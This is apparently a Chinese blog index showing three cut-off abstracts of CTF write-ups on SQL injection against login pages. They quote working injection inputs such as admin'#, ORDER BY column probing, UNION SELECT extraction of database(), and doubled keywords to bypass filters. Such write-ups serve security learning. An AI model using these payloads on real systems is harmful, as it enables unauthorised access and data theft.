摘要:
先查看f12找到一个目录,进去之后继续f12有一段base32,继续base64解码得到 select * from user where username = '$name' 所以也就知道后台检测是账户和密码分开的,先检查是否存在指定的账户,然后把该账户的所有信息都查询出来,再和输入的密码进行比较 阅读全文
摘要:
admin'#万能密码,给出一段md5没啥鸟用。 试常规注入流程吧,先判断列数。 admin' order by 1# or被过滤掉了呢,尝试大小写,注释符都无法绕过,双写有了新的报错,说明绕过成功,双写by,绕过成功。 增加到四列,出现报错 说明列数为3。一顿撸 -1' uniunionon se 阅读全文
摘要:
admin'#登录爆出admin用户密码,MD5解密无果。 常规方法一顿撸。 admin' order by 4# 报错,字段数为3。 -1' union select 1,2,3# 报出显示位。 -1' union select 1,database(),3# 报出数据库名。 -1' union 阅读全文